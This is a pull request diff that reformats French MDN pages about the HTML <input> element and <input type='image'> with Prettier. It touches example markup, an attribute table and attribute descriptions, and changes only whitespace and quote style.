### PR TITLE
fr: Format /web/html using Prettier (part 3)

### DIFF
--- a/files/fr/web/html/element/input/image/index.md
+++ b/files/fr/web/html/element/input/image/index.md
@@ -150,8 +150,13 @@ Un élément `<input type="image">` est [un élément remplacé](/fr/docs/Web/CS
 Prenons un exemple simple qui utilise les différentes fonctionnalités essentielles d'un tel bouton (et qui fonctionnent de la même façon que pour un élément `<img>`)&nbsp;:
 
 ```html
-<input id="image" type="image" width="100" height="30" alt="Login"
-       src="https://raw.githubusercontent.com/mdn/learning-area/master/html/forms/image-type-example/login.png">
+<input
+  id="image"
+  type="image"
+  width="100"
+  height="30"
+  alt="Login"
+  src="https://raw.githubusercontent.com/mdn/learning-area/master/html/forms/image-type-example/login.png" />
 ```
 
 {{EmbedLiveSample('', 600, 50)}}
@@ -199,14 +204,19 @@ L'exemple suivant affiche le même bouton qu'auparavant, cette fois-ci inclus da
   <p>Connectez-vous à votre compte</p>
   <div>
     <label for="userId">Identifiant utilisateur</label>
-    <input type="text" id="userId" name="userId">
+    <input type="text" id="userId" name="userId" />
   </div>
   <div>
     <label for="pwd">Mot de passe</label>
-    <input type="password" id="pwd" name="pwd">
+    <input type="password" id="pwd" name="pwd" />
   </div>
   <div>
-    <input id="image" type="image" src="https://raw.githubusercontent.com/mdn/learning-area/master/html/forms/image-type-example/login.png" alt="Login" width="100">
+    <input
+      id="image"
+      type="image"
+      src="https://raw.githubusercontent.com/mdn/learning-area/master/html/forms/image-type-example/login.png"
+      alt="Login"
+      width="100" />
   </div>
 </form>
 ```
@@ -243,16 +253,20 @@ Dans ce nouvel exemple, on adapte l'exemple précédent afin d'avoir plus de pla
   <p>Connectez-vous à votre compte</p>
   <div>
     <label for="userId">Identifiant utilisateur</label>
-    <input type="text" id="userId" name="userId">
+    <input type="text" id="userId" name="userId" />
   </div>
   <div>
     <label for="pwd">Mot de passe</label>
-    <input type="password" id="pwd" name="pwd">
+    <input type="password" id="pwd" name="pwd" />
   </div>
   <div>
-    <input id="image" type="image"
+    <input
+      id="image"
+      type="image"
       src="https://raw.githubusercontent.com/mdn/learning-area/master/html/forms/image-type-example/login.png"
-      alt="Login" width="200" height="100">
+      alt="Login"
+      width="200"
+      height="100" />
   </div>
 </form>
 ```

--- a/files/fr/web/html/element/input/index.md
+++ b/files/fr/web/html/element/input/index.md
@@ -266,39 +266,39 @@ Sur cette page, vous trouverez des informations sur les attributs communs à l'e
 
 Les éléments `<input>` peuvent utiliser les [attributs universels](/fr/docs/Web/HTML/Global_attributes) et les attributs suivants&nbsp;:
 
-| Attribut                            | Type(s)                                    | Description                                                                                                                      |
-| ----------------------------------- | ------------------------------------------ | ---------------------------------------------------------------------------------------------------------------------------------|
-| [`accept`](#accept)                 | `file`                                     | Une indication quant au type de fichier attendu pour l'<i lang="en">upload</i>                                                   |
-| [`alt`](#alt)                       | `image`                                    | Un texte alternatif à l'image, nécessaire pour une accessibilité correcte                                                        |
-| [`autocomplete`](#autocomplete)     | tous                                       | Une indication pour le remplissage automatique du formulaire                                                                     |
-| [`capture`](#capture)               | `file`                                     | La méthode de capture du média pour l'upload du fichier                                                                          |
-| [`checked`](#checked)               | `radio`, `checkbox`                        | Indique si l'option est sélectionnée ou si la case est cochée                                                                    |
-| [`dirname`](#dirname)               | `text`, `search`                           | Le nom du champ de formulaire à utiliser pour envoyer le sens d'écriture de l'élément à l'envoi du formulaire                    |
-| [`disabled`](#disabled)             | tous                                       | Indique si le contrôle est désactivé                                                                                             |
-| [`form`](#form)                     | tous                                       | Associe un contrôle à un élément de formulaire                                                                                   |
-| [`formaction`](#formaction)         | `image`, `submit`                          | L'URL à utiliser pour l'envoi du formulaire                                                                                      |
-| [`formenctype`](#formenctype)       | `image`, `submit`                          | L'encodage des données à utiliser pour l'envoi du formulaire                                                                     |
-| [`formmethod`](#formmethod)         | `image`, `submit`                          | La méthode HTTP à utiliser pour envoyer le formulaire                                                                            |
-| [`formnovalidate`](#formnovalidate) | `image`, `submit`                          | Surcharge la validation du contrôle dictée par le formulaire pour l'envoi de ce dernier                                          |
-| [`formtarget`](#formtarget)         | `image`, `submit`                          | Le contexte de navigation à utiliser pour l'envoi du formulaire                                                                  |
-| [`height`](#height)                 | `image`                                    | Analogue à l'attribut `height` de l'élément [`<img>`](/fr/docs/Web/HTML/Element/Img), la hauteur de l'image            |
+| Attribut                            | Type(s)                                    | Description                                                                                                                           |
+| ----------------------------------- | ------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------- |
+| [`accept`](#accept)                 | `file`                                     | Une indication quant au type de fichier attendu pour l'<i lang="en">upload</i>                                                        |
+| [`alt`](#alt)                       | `image`                                    | Un texte alternatif à l'image, nécessaire pour une accessibilité correcte                                                             |
+| [`autocomplete`](#autocomplete)     | tous                                       | Une indication pour le remplissage automatique du formulaire                                                                          |
+| [`capture`](#capture)               | `file`                                     | La méthode de capture du média pour l'upload du fichier                                                                               |
+| [`checked`](#checked)               | `radio`, `checkbox`                        | Indique si l'option est sélectionnée ou si la case est cochée                                                                         |
+| [`dirname`](#dirname)               | `text`, `search`                           | Le nom du champ de formulaire à utiliser pour envoyer le sens d'écriture de l'élément à l'envoi du formulaire                         |
+| [`disabled`](#disabled)             | tous                                       | Indique si le contrôle est désactivé                                                                                                  |
+| [`form`](#form)                     | tous                                       | Associe un contrôle à un élément de formulaire                                                                                        |
+| [`formaction`](#formaction)         | `image`, `submit`                          | L'URL à utiliser pour l'envoi du formulaire                                                                                           |
+| [`formenctype`](#formenctype)       | `image`, `submit`                          | L'encodage des données à utiliser pour l'envoi du formulaire                                                                          |
+| [`formmethod`](#formmethod)         | `image`, `submit`                          | La méthode HTTP à utiliser pour envoyer le formulaire                                                                                 |
+| [`formnovalidate`](#formnovalidate) | `image`, `submit`                          | Surcharge la validation du contrôle dictée par le formulaire pour l'envoi de ce dernier                                               |
+| [`formtarget`](#formtarget)         | `image`, `submit`                          | Le contexte de navigation à utiliser pour l'envoi du formulaire                                                                       |
+| [`height`](#height)                 | `image`                                    | Analogue à l'attribut `height` de l'élément [`<img>`](/fr/docs/Web/HTML/Element/Img), la hauteur de l'image                           |
 | [`list`](#list)                     | presque tous                               | La valeur de l'attribut `id` de l'élément [`<datalist>`](/fr/docs/Web/HTML/Element/datalist) fournissant les options d'autocomplétion |
-| [`max`](#max)                       | types numériques                           | La valeur maximale                                                                                                               |
-| [`maxlength`](#maxlength)           | `password`, `search`, `tel`, `text`, `url` | La longueur maximale (en nombre de caractères) de l'attribut `value`                                                             |
-| [`min`](#min)                       | types numériques                           | La valeur minimale                                                                                                               |
-| [`minlength`](#minlength)           | `password`, `search`, `tel`, `text`, `url` | La longueur minimale (en nombre de caractères) de l'attribut `value`                                                             |
-| [`multiple`](#multiple)             | `email`, `file`                            | Un booléen indiquant si plusieurs valeurs sont acceptées                                                                         |
-| [`name`](#name)                     | tous                                       | Le nom associé au contrôle et qui est envoyé avec le formulaire associé à la valeur sous la forme d'une paire nom/valeur         |
-| [`pattern`](#pattern)               | `password`, `text`, `tel`                  | Un motif que la valeur doit respecter afin d'être valide                                                                         |
-| [`placeholder`](#placeholder)       | `password`, `search`, `tel`, `text`, `url` | Un texte qui apparaît dans le contrôle lorsqu'aucune valeur n'y est écrite                                                       |
-| [`readonly`](#readonly)             | presque tous                               | Un booléen indiquant que la valeur n'est pas éditable                                                                            |
-| [`required`](#required)             | presque tous                               | Un booléen indiquant que la valeur est requise ou que le contrôle doit être coché avant de pouvoir envoyer le formulaire         |
-| [`size`](#size)                     | `email`, `password`, `tel`, `text`, `url`  | La taille du contrôle                                                                                                            |
-| [`src`](#src)                       | `image`                                    | Analogue à l'attribut `src` de l'élément [`<img>`](/fr/docs/Web/HTML/Element/Img), indique l'emplacement de l'image              |
-| [`step`](#step)                     | types numériques                           | Un incrément pour les valeurs valides                                                                                            |
-| [`type`](#type)                     | tous                                       | Le type de contrôle de formulaire                                                                                                |
-| [`value`](#value)                   | tous                                       | La valeur initiale du contrôle                                                                                                   |
-| [`width`](#width)                   | `image`                                    | Analogue à l'attribut `width` de l'élément [`<img>`](/fr/docs/Web/HTML/Element/Img), la largeur de l'image                       |
+| [`max`](#max)                       | types numériques                           | La valeur maximale                                                                                                                    |
+| [`maxlength`](#maxlength)           | `password`, `search`, `tel`, `text`, `url` | La longueur maximale (en nombre de caractères) de l'attribut `value`                                                                  |
+| [`min`](#min)                       | types numériques                           | La valeur minimale                                                                                                                    |
+| [`minlength`](#minlength)           | `password`, `search`, `tel`, `text`, `url` | La longueur minimale (en nombre de caractères) de l'attribut `value`                                                                  |
+| [`multiple`](#multiple)             | `email`, `file`                            | Un booléen indiquant si plusieurs valeurs sont acceptées                                                                              |
+| [`name`](#name)                     | tous                                       | Le nom associé au contrôle et qui est envoyé avec le formulaire associé à la valeur sous la forme d'une paire nom/valeur              |
+| [`pattern`](#pattern)               | `password`, `text`, `tel`                  | Un motif que la valeur doit respecter afin d'être valide                                                                              |
+| [`placeholder`](#placeholder)       | `password`, `search`, `tel`, `text`, `url` | Un texte qui apparaît dans le contrôle lorsqu'aucune valeur n'y est écrite                                                            |
+| [`readonly`](#readonly)             | presque tous                               | Un booléen indiquant que la valeur n'est pas éditable                                                                                 |
+| [`required`](#required)             | presque tous                               | Un booléen indiquant que la valeur est requise ou que le contrôle doit être coché avant de pouvoir envoyer le formulaire              |
+| [`size`](#size)                     | `email`, `password`, `tel`, `text`, `url`  | La taille du contrôle                                                                                                                 |
+| [`src`](#src)                       | `image`                                    | Analogue à l'attribut `src` de l'élément [`<img>`](/fr/docs/Web/HTML/Element/Img), indique l'emplacement de l'image                   |
+| [`step`](#step)                     | types numériques                           | Un incrément pour les valeurs valides                                                                                                 |
+| [`type`](#type)                     | tous                                       | Le type de contrôle de formulaire                                                                                                     |
+| [`value`](#value)                   | tous                                       | La valeur initiale du contrôle                                                                                                        |
+| [`width`](#width)                   | `image`                                    | Analogue à l'attribut `width` de l'élément [`<img>`](/fr/docs/Web/HTML/Element/Img), la largeur de l'image                            |
 
 Certains attributs non-standard supplémentaires sont listés après les descriptions des attributs standard.
 
@@ -311,7 +311,9 @@ Certains attributs non-standard supplémentaires sont listés après les descrip
 - [`autocomplete`](/fr/docs/Web/HTML/Attributes/autocomplete)
   - : **Cet attribut n'est pas booléen&nbsp;!** Il prend comme valeur une chaîne de caractères dont les valeurs sont séparées par des espaces qui décrivent, le cas échéant, le type de fonctionnalité à fournir pour l'autocomplétion du champ. Généralement, l'implémentation de l'autocomplétion repose sur les valeurs précédemment saisies dans le même champ, mais le navigateur peut implémenter une forme d'autocomplétion plus avancée (par exemple intégrer la liste des contacts connue de l'appareil pour autocompléter les champs `email`). Voir [la page sur cet attribut](/fr/docs/Web/HTML/Attributes/autocomplete#valeurs) pour les valeurs autorisées. Cet attribut est valide pour les types de champ `hidden`, `text`, `search`, `url`, `tel`, `email`, `date`, `month`, `week`, `time`, `datetime-local`, `number`, `range`, `color`, et `password`. Il n'a pas d'effet pour les types de champs qui ne renvoient pas de données numériques ou text et est donc valide pour tous les types de champs à l'exception de `checkbox`, `radio`, `file`, ou des types de bouton. Voir [la page de l'attribut HTML `autocomplete`](/fr/docs/Web/HTML/Attributes/autocomplete) pour plus d'informations, y compris sur la sécurité des mots de passe et sur la façon dont `autocomplete` s'applique légèrement différemment pour les champs de type `hidden`.
 - `autofocus`
+
   - : Un attribut booléen qui, s'il est présent, indique que le contrôle devrait automatiquement recevoir le focus lorsque le chargement de la page est terminé (ou lorsque l'élément [`<dialog>`](/fr/docs/Web/HTML/Element/dialog) qui contient ce contrôle a été affiché).
+
     > **Note :** Un élément avec l'attribut `autofocus` pourra recevoir le focus avant le déclenchement de l'évènement [`DOMContentLoaded`](/fr/docs/Web/API/Window/DOMContentLoaded_event).
 
     Il ne peut pas y avoir plus d'un élément du document avec l'attribut `autofocus`. Si l'attribut est placé sur plus d'un élément, c'est le premier qui reçoit le focus.
@@ -321,38 +323,50 @@ Certains attributs non-standard supplémentaires sont listés après les descrip
     > **Attention :** Affecter le focus de façon automatique peut être source de confusion pour les personnes qui utilisent des lecteurs d'écran ou qui ont des difficultés cognitives. En effet, avec l'affectation d'`autofocus`, les lecteurs d'écran «&nbsp;téléportent&nbsp;» la personne jusqu'au contrôle, sans avertissement préalable.
 
     On fera particulièrement attention à l'accessibilité en appliquant l'attribut `autofocus`. Le focus automatique peut entraîner le défilement de la page au chargement et faire apparaître le clavier logiciel sur certains appareils tactiles. Bien qu'un lecteur d'écran puisse annoncer le libellé du contrôle qui reçoit le focus, il n'annoncera rien avant le libellé. De même, une personne sans déficience visuelle sur un petit écran manquera certainement le contexte créé par le contenu qui précède.
+
 - `capture`
   - : Cet attribut, introduit avec la spécification HTML <i lang="en">Media Capture</i>, est uniquement valide pour le type `file`. Il définit quel appareil (micro, caméra, appareil photo) qui devrait être utilisé pour capturer un nouveau fichier à uploader. Voir la page détaillée sur [`<input type="file">`](/fr/docs/Web/HTML/Element/Input/file).
 - `checked`
+
   - : Cet attribut booléen est valide pour les types `radio` et `checkbox`. Lorsqu'il est présent sur un contrôle de type `radio`, il indique que ce bouton radio sera celui sélectionné parmi le groupe de boutons radio qui partagent le même nom. Lorsqu'il est présent sur un contrôle de type `checkbox`, il indique que la case est cochée par défaut au chargement de la page. Attention, il _n'indique pas_ que la case est actuellement cochée, si l'état de la case à cocher change, l'attribut ne reflète pas ce changement (seul l'attribut IDL [`HTMLInputElement.checked`](/fr/docs/Web/API/HTMLInputElement) est mis à jour).
 
     > **Note :** À la différence des autres contrôles de saisie, la valeur d'une case à cocher ou d'un bouton radio est uniquement incluse dans les données envoyées s'ils sont sélectionnés. Si c'est le cas, le nom et la valeur des contrôles sélectionnés sont envoyés.
     >
     > Ainsi, si une case à cocher dont l'attribut `name` vaut `fruit` et dont l'attribut `value` vaut `cerise`, si la case est cochée, les données envoyées avec le formulaire contiendront `fruit=cerise`. Si la case à cocher n'est pas active, elle ne fera pas partie des données envoyées. Pour les cases à cocher et les boutons radio, la valeur par défaut de l'attribut `value` est `on`.
+
 - `dirname`
+
   - : Cet attribut, uniquement valide pour les types `text` et `search`, permet d'envoyer également le sens d'écriture de la valeur dans le formulaire. Lorsqu'il est présent, le contrôle du formulaire enverra deux paires nom/valeur&nbsp;: la première composée de [`name`](#name) et [`value`](#value), et la seconde composée de la valeur de `dirname` comme nom et de `ltr` ou `rtl` comme valeur, indiquée par le navigateur.
 
     ```html
     <form action="page.html" method="post">
-      <label>Fruit : <input type="text" name="fruit" dirname="fruit.dir" value="cerise"></label>
-      <input type="submit"/>
+      <label
+        >Fruit :
+        <input type="text" name="fruit" dirname="fruit.dir" value="cerise"
+      /></label>
+      <input type="submit" />
     </form>
     <!-- page.html?fruit=cerise&fruit.dir=ltr -->
     ```
 
     Lorsque le formulaire précédent est envoyé, on aura l'envoi de deux paires de clé/valeur `name`/`value` d'une part avec `fruit=cerise` et `dirname`/sens d'écriture d'autre part avec `fruit.dir=ltr`.
+
 - `disabled`
+
   - : Un attribut booléen qui, lorsqu'il est présent, indique qu'il n'est pas possible d'interagir avec le champ. Les champs désactivés sont généralement affichés avec une couleur plus sombre ou une autre forme d'indication pour signifier que le champ n'est pas utilisable.
 
     Plus précisément, les champs désactivés ne reçoivent pas les évènements [`click`](/fr/docs/Web/API/Element/click_event) et ne sont pas envoyés avec le formulaire.
 
     > **Note :** Bien que cela ne soit pas nécessaire selon la spécification, par défaut, Firefox [fera persister l'état désactivé obtenu dynamiquement](https://stackoverflow.com/questions/5985839/bug-with-firefox-disabled-attribute-of-input-not-resetting-when-refreshing) pour un champ `<input>` même après des rechargements de la page. C'est l'attribut [`autocomplete`](#autocomplete) qui contrôle cette fonctionnalité.
+
 - `form`
+
   - : Une chaîne de caractères qui indique l'élément [`<form>`](/fr/docs/Web/HTML/Element/Form) auquel le contrôle est associé (on parle de son **formulaire propriétaire**). La valeur de la chaîne de caractères, si elle est présente, doit correspondre à la valeur d'un identifiant (l'attribut [`id`](#id)) d'un élément `<form>` du même document. Si cet attribut n'est pas défini, l'élément `<input>` est associé au formulaire qui le contient le plus proche, s'il existe.
 
     L'attribut `form` permet ainsi de placer un champ n'importe où dans le document tout en l'associant à un formulaire du document situé autre part.
 
     > **Note :** Un champ peut uniquement être associé avec un seul formulaire.
+
 - `formaction`
   - : Uniquement valide pour les types `image` et `submit`. Voir la page détaillée sur [`<input type="submit">`](/fr/docs/Web/HTML/Element/Input/submit).
 - `formenctype`
@@ -370,6 +384,7 @@ Certains attributs non-standard supplémentaires sont listés après les descrip
 - `inputmode`
   - : Un attribut universel, valide pour tous les éléments, qui fournit une indication au navigateur quant au type de clavier virtuel à utiliser pour l'édition de l'élément ou de son contenu. Les valeurs possibles sont `none`, `text`, `tel`, `url`, `email`, `numeric`, `decimal`, et `search`.
 - `list`
+
   - : La valeur fournie à l'attribut `list` doit être l'identifiant (l'attribut [`id`](/fr/docs/Web/HTML/Global_attributes/id)) d'un élément [`<datalist>`](/fr/docs/Web/HTML/Element/datalist) situé dans le même document. L'élément `<datalist>` fournit alors une liste de valeurs prédéfinies qui peuvent être suggérées pour la saisie dans le champ. Toute valeur de cette liste qui n'est pas compatible avec l'attribut [`type`](#type) ne sera pas incluse dans les suggestions. Les valeurs ainsi fournies sont des suggestions et pas des contraintes, une personne pourra tout à fait choisir parmi cette liste ou fournir une valeur différente.
 
     Cet attribut est valide pour les champs de type `text`, `search`, `url`, `tel`, `email`, `date`, `month`, `week`, `time`, `datetime-local`, `number`, `range`, et `color`.
@@ -379,27 +394,37 @@ Certains attributs non-standard supplémentaires sont listés après les descrip
     Selon le navigateur, on pourra avoir une palette de couleurs spécifiques en suggestion, des marques présentes sur la piste d'un curseur, voire un contrôle s'ouvrant comme un élément [`<select>`](/fr/docs/Web/HTML/Element/select) et qui permet de saisir des valeurs en dehors des suggestions. Voir [le tableau de compatibilité des navigateurs](/fr/docs/Web/HTML/Element/datalist#compatibilité_des_navigateurs) pour les autres types de champ.
 
     Voir également [la page de référence pour l'élément `<datalist>`](/fr/docs/Web/HTML/Element/datalist).
+
 - `max`
+
   - : Cet attribut est valide pour les types `date`, `month`, `week`, `time`, `datetime-local`, `number`, et `range`, il définit la plus grande valeur possible de l'intervalle des valeurs autorisées. Si la valeur saisie dans l'élément dépasse la valeur de cet attribut, l'élément échouera à [la validation des contraintes](/fr/docs/Web/Guide/HTML/Constraint_validation). Si la valeur de l'attribut `max` n'est pas un nombre, l'élément n'a pas de valeur maximale.
 
     Il existe un cas particulier pour les types de données périodiques (comme les dates ou les heures), où la valeur de `max` peut être inférieure à celle de `min`, pour avoir par exemple un intervalle de temps entre 10 heures du soir et 4 heures du matin.
+
 - `maxlength`
+
   - : Cet attribut est valide pour les types `text`, `search`, `url`, `tel`, `email`, et `password`, il définit le nombre maximal de caractères (exprimé en nombre de codets UTF-16) qu'il est possible de saisir dans le champ. La valeur de cet attribut doit être un entier positif. Si aucune valeur de `maxlength` n'est indiquée ou qu'une valeur invalide est fournie, le champ n'a pas de longueur maximale. La valeur de cet attribut doit être supérieure ou égale à celle de `minlength`.
 
     Le champ échouera à [la validation des contraintes](/fr/docs/Web/Guide/HTML/Constraint_validation) si longueur du texte saisi est supérieure à `maxlength` comme nombre de codets UTF-16. Par défaut, les navigateurs empêchent de saisir plus de caractères que ce qui est permis par l'attribut `maxlength`. Voir [la validation côté client](#validation_côté_client) pour plus d'information.
+
 - `min`
+
   - : Cet attribut est valide pour les types `date`, `month`, `week`, `time`, `datetime-local`, `number`, et `range`, il définit la valeur la plus faible de l'intervalle des valeurs autorisées. Si la valeur saisie dans l'élément est inférieure à la valeur de cet attribut, l'élément échouera à [la validation des contraintes](/fr/docs/Web/Guide/HTML/Constraint_validation). Si la valeur de l'attribut `min` n'est pas un nombre, l'élément n'a pas de valeur minimale.
 
     Cette valeur doit être inférieure ou égale à la valeur fournie par l'attribut `max`. Si l'attribut `min` est présent mais sans valeur ou avec une valeur invalide, aucune contrainte de minimum n'est appliquée. Si l'attribut `min` est valide et que la valeur saisie dans le contrôle est inférieure à celle de cet attribut, la validation des contraintes empêchera l'envoi du formulaire. Voir [la validation côté client](#validation_côté_client) pour plus d'information.
 
     Il existe un cas particulier pour les types de données périodiques (comme les dates ou les heures), où la valeur de `max` peut être inférieure à celle de `min`, pour avoir par exemple un intervalle de temps entre 10 heures du soir et 4 heures du matin.
+
 - `minlength`
+
   - : Cet attribut est valide pour les types `text`, `search`, `url`, `tel`, `email`, et `password`, il définit le nombre minimal de caractères (exprimé en nombre de codets UTF-16) qu'il est possible de saisir dans le champ. La valeur de cet attribut doit être un entier positif inférieur ou égal à celle de `maxlength`. Si cet attribut est absent ou qu'une valeur invalide est indiquée, le champ n'aura pas de longueur minimale.
 
     Le champ échouera à [la validation des contraintes](/fr/docs/Web/Guide/HTML/Constraint_validation) si longueur du texte saisi est inférieure à `minlength` comme nombre de codets UTF-16. Voir [la validation côté client](#validation_côté_client) pour plus d'information.
+
 - `multiple`
   - : Un attribut booléen qui, lorsqu'il est présent, permet de saisir plusieurs adresses électroniques séparées par des virgules ou de sélectionner plusieurs fichiers si le contrôle est de type `file`. Voir les page détaillées sur [`<input type="file">`](/fr/docs/Web/HTML/Element/Input/file) et [`<input type="email">`](/fr/docs/Web/HTML/Element/input/email).
 - `name`
+
   - : Une chaîne de caractères qui fourni le nom associé au contrôle. Le nom est envoyé avec la valeur du contrôle lors de l'envoi du formulaire.
 
     Cet attribut n'est pas strictement obligatoire mais devrait être utilisé dans la grande majorité des cas. Si un champ n'a pas d'attribut `name` ou que celui-ci est vide, la valeur du champ n'est pas envoyée avec le formulaire (à l'instar des contrôles désactivés, des boutons radio ou cases décochés, et des boutons de réinitialisation).
@@ -420,16 +445,18 @@ Certains attributs non-standard supplémentaires sont listés après les descrip
     Lorsqu'un élément `<input>` possède un attribut `name`, ce nom devient une propriété de l'objet [`HTMLFormElement.elements`](/fr/docs/Web/API/HTMLFormElement/elements) associé au formulaire propriétaire. Ainsi, si on a un champ dont le nom est `invite` et un autre dont le nom est `taille-chat`, on pourra manipuler les données du formulaire en JavaScript comme suit&nbsp;:
 
     ```js
-    let form = document.querySelector('form');
+    let form = document.querySelector("form");
 
     let nomInvite = form.elements.invite;
-    let tailleChat = form.elements['taille-chat'];
+    let tailleChat = form.elements["taille-chat"];
     ```
 
     À l'exécution de ce code, `nomInvite` correspondra à l'objet [`HTMLInputElement`](/fr/docs/Web/API/HTMLInputElement) associé au champ `invite`, et de même l'objet `tailleChat` correspondra à l'objet du DOM associé au champ avec le nom `taille-chat`.
 
     > **Attention :** On évitera de donner aux éléments de formulaire un nom qui correspond à une propriété native du DOM. Cela surchargerait la propriété ou la méthode native pour pointer vers le champ correspondant.
+
 - `pattern`
+
   - : Cet attribut est une expression rationnelle que la valeur du champ doit respecter afin de [valider les contraintes](/fr/docs/Web/Guide/HTML/Constraint_validation). Cette valeur doit être une expression rationnelle JavaScript valide (voir [`RegExp`](/fr/docs/Web/JavaScript/Reference/Global_Objects/RegExp)) telle que documentée dans [le guide sur les expressions rationnelles](/fr/docs/Web/JavaScript/Guide/Regular_Expressions). Le marqueur `'u'` est implicitement appliqué à la compilation de l'expression et le motif est donc traité comme une séquence de codets Unicode et non ASCII. Il ne faut pas encadrer le motif de barres obliques.
 
     Si l'attribut `pattern` est présent mais sans valeur ou que celle-ci est valide, aucune expression rationnelle n'est appliquée et l'attribut est ignoré. Si la valeur de `pattern` est valide et que la valeur du champ ne respecte pas le motif, le champ échouera à [la validation des contraintes](/fr/docs/Web/Guide/HTML/Constraint_validation) et empêchera l'envoi du formulaire.
@@ -437,23 +464,31 @@ Certains attributs non-standard supplémentaires sont listés après les descrip
     > **Note :** En utilisant l'attribut `pattern`, il faut également informer l'utilisatrice ou l'utilisateur quant au format attendu, en ajoutant un texte explicatif à proximité. On peut aussi inclure un attribut [`title`](#title) pour expliquer les contraintes à respecter&nbsp;: la plupart des navigateurs afficheront le titre sous la forme d'une bulle d'information. Attention, une explication visible est nécessaire pour une accessibilité correcte, la bulle d'information fournie par `title` n'est qu'une amélioration secondaire.
 
     Voir [la validation côté client](#validation_côté_client) pour plus d'information.
+
 - `placeholder`
+
   - : Cet attribut est une chaîne de caractères qui fournit une brève indication quant au type d'information attendu dans le champ. Sa valeur devrait être un mot ou une courte phrase qui indique le type de données attendu plutôt qu'une explication ou une consigne. Le texte de cet attribut _ne doit pas_ inclure de retour chariot ou de saut de ligne. Ainsi, si un champ est destiné à la saisie d'un prénom et que le libellé est «&nbsp;Prénom&nbsp;», une valeur appropriée pour cet attribut pourra être `"ex. Mustafa"`.
 
     > **Note :** Sur le plan sémantique, l'attribut `placeholder` n'est pas aussi utile que d'autres méthodes pour expliquer le formulaire. Il peut aussi causer certains problèmes inattendus avec le contenu. Voir [les libellés](#libellés) pour plus d'informations.
+
 - `readonly`
+
   - : Un attribut booléen qui, lorsqu'il est présent, indique qu'il ne devrait pas être possible d'éditer la valeur du champ. Cet attribut est pris en charge par les types de contrôle `text`, `search`, `url`, `tel`, `email`, `date`, `month`, `week`, `time`, `datetime-local`, `number`, et `password`.
 
     Voir [l'attribut HTML `readonly`](/fr/docs/Web/HTML/Attributes/readonly) pour plus d'informations.
+
 - `required`
+
   - : Un attribut booléen qui, lorsqu'il est présent, indique qu'une valeur doit être saisie avant que le formulaire puisse être envoyé. Cet attribut est pris en charge pour les types de contrôle `text`, `search`, `url`, `tel`, `email`, `date`, `month`, `week`, `time`, `datetime-local`, `number`, `password`, `checkbox`, `radio`, et `file`.
 
     Voir [la validation côté client](#validation_côté_client) et [l'attribut HTML `required`](/fr/docs/Web/HTML/Attributes/required) pour plus d'informations.
+
 - `size`
   - : Cet attribut est uniquement valide pour les types de contrôle `email`, `password`, `tel`, `url` et `text`. Il indique la largeur visible pour le contrôle. D'une certaine façon, il crée un résultat analogue à l'application de la propriété CSS `width`. L'unité de cette valeur dépend du type de contrôle. Pour les champs de type `password` et `text`, il s'agit du nombre de caractères (équivalent à l'unité `em`) et la valeur par défaut vaut `20`. Pour les autres types de champs, la valeur est exprimée en pixels. La largeur définie avec la feuille de style CSS aura la priorité sur cet attribut.
 - `src`
   - : Cet attribut est uniquement valide pour le type `image` et indique l'URL du fichier de l'image à afficher sur le bouton. Voir [`<input type="image">`](/fr/docs/Web/HTML/Element/input/image) pour plus d'informations.
 - `step`
+
   - : Cet attribut est valide pour les contrôles de type numérique (`number`, dates/heures, `range`). L'attribut [`step`](/fr/docs/Web/HTML/Attributes/step) est un nombre qui définit la granularité de la valeur.
 
     S'il n'est pas explicitement inclus&nbsp;:
@@ -470,14 +505,17 @@ Certains attributs non-standard supplémentaires sont listés après les descrip
     > **Note :** Lorsque la donnée saisie ne respecte pas l'incrément, la valeur est considérée comme invalide pour la validation des contraintes et l'élément sera ciblé par la pseudo-classe `:invalid`.
 
     Voir [la validation côté client](#validation_côté_client) pour plus d'information.
+
 - `tabindex`
   - : Un attribut universel, valide pour tous les éléments, y compris tous les types de `<input>`. Sa valeur est un entier qui indique si l'élément peut prendre le focus et s'il devrait participer à la navigation séquentielle au clavier. Comme tous les types d'élément `<input>`, sauf ceux masqués, peuvent prendre le focus, cet attribut ne devrait pas être utilisé sur les contrôles de formulaire, car cela nécessiterait de gérer l'ordre du focus pour tous les éléments du document, au risque de dégradé l'utilisabilité et l'accessibilité si cela était fait de façon incorrecte.
 - `title`
   - : Un attribut universel, valide pour tous les éléments, y compris tous les types de `<input>`. Sa valeur est un texte fournissant des informations à propos de l'élément auquel il appartient. Une telle information est généralement (mais pas nécessairement) affichée sous la forme d'une bulle d'information. `title` ne devrait pas être utilisé comme méthode principale pour expliquer le rôle d'un contrôle de formulaire. Il faut plutôt utiliser l'élément [`<label>`](/fr/docs/Web/HTML/Element/Label) avec un attribut `for` dont la valeur correspond à la valeur de l'attribut [`id`](#id) du champ de formulaire. Voir [la section sur les libellés](#libellés) ci-après.
 - `type`
+
   - : Une chaîne de caractères qui indique le type de contrôle à afficher. On utilisera par exemple la valeur `checkbox` pour afficher une case à cocher. Si cet attribut est absent (ou qu'une valeur inconnue est utilisée), ce sera un champ de type `text` qui sera utilisé, permettant de saisir un texte dans le contrôle de formulaire.
 
     Les valeurs autorisées pour cet attribut sont listées dans [la section sur les types de champ](#les_différents_types_de_champs_input) ci-avant.
+
 - `value`
   - : La valeur du contrôle. Lorsque cette valeur est fournie dans le document HTML, il s'agit de la valeur initiale, qui peut ensuite être récupérée et éventuellement modifiée avec JavaScript via la propriété du DOM correspondante&nbsp;: [`HTMLInputElement.value`](/fr/docs/Web/API/HTMLInputElement). Cet attribut est toujours optionnel en théorie, mais peut être considéré comme obligatoire en pratique pour les types de champ `checkbox`, `radio`, et `hidden`.
 - `width`
@@ -534,11 +572,13 @@ Les attributs qui suivent ne sont pas standard et sont disponibles dans certains
     - `off`
       - : La correction automatique et les substitutions de texte sont désactivées.
 - `incremental` {{non-standard_inline}}
+
   - : Cet attribut booléen est une extension de WebKit et Blink (présent donc dans les navigateurs Safari, Opera, Chrome, etc.) qui indique, s'il est présent, que le champ doit être traité comme un champ de recherche dynamique. Lorsque la personne édite la valeur du champ, l'agent utilisateur envoie des évènements [`search`](/fr/docs/Web/API/HTMLInputElement/search_event) à l'objet [`HTMLInputElement`](/fr/docs/Web/API/HTMLInputElement) qui représente le champ de recherche. Cela permet de gérer, via du code, la mise à jour des résultats de recherche en temps réel lors de l'édition.
 
     Si `incremental` n'est pas indiqué, l'évènement [`search`](/fr/docs/Web/API/HTMLInputElement/search_event) est uniquement envoyé lorsque la personne initie explicitement une recherche, c'est-à-dire en appuyant sur la touche <kbd>Entrée</kbd> ou <kbd>Retour</kbd> lors de l'édition du champ.
 
